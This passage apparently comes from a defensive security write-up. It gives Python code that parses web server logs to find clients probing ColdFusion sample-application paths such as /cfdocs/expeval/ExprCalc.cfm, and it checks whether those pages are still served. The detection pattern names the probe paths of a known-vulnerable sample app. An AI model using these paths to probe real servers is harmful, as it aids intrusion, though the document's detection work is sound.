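192.0.2.10 - - [29/Apr/1999:14:03:02 -0400] "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 200 1102
192.0.2.10 - - [29/Apr/1999:14:03:02 -0400] "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0" 200 2870
198.51.100.7 - - [29/Apr/1999:15:10:40 -0400] "GET /CFDOCS/expeval/ExprCalc.cfm HTTP/1.0" 404 210
"""


def parse_clf(line: str) -> Optional[dict]:
    """Return the named fields of one CLF line, or None if it does not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def is_sample_app_request(path: str) -> bool:
    """Case-insensitive match with any query string stripped first."""
    bare = path.split("?", 1)[0].lower()
    return bare in SAMPLE_APP_PATHS


def find_probes(log_text: str) -> Dict[str, List[Tuple[str, int]]]:
    """Map each client host to the (path, status) pairs it requested under
    /cfdocs/expeval/. A 200 means the page was served, which is what
    coldscan.c reports as 'Exists!'."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec and is_sample_app_request(rec["path"]):
            hits[rec["host"]].append((rec["path"], int(rec["status"])))
    return dict(hits)


def still_exposed(log_text: str) -> bool:
    """True if any sample-app request in the log was answered with HTTP 200."""
    return any(
        status == 200
        for pairs in find_probes(log_text).values()
        for _, status in pairs
    )


if __name__ == "__main__":
    for host, pairs in find_probes(SAMPLE_LOG).items():
        print(host, pairs)
    print("sample apps still reachable:", still_exposed(SAMPLE_LOG))
```

A 404 from a probing client is still worth keeping: it records who scanned, and the same host appearing later with other ColdFusion paths is the pattern the PC Week article describes, sites being hit weeks after the patch was available.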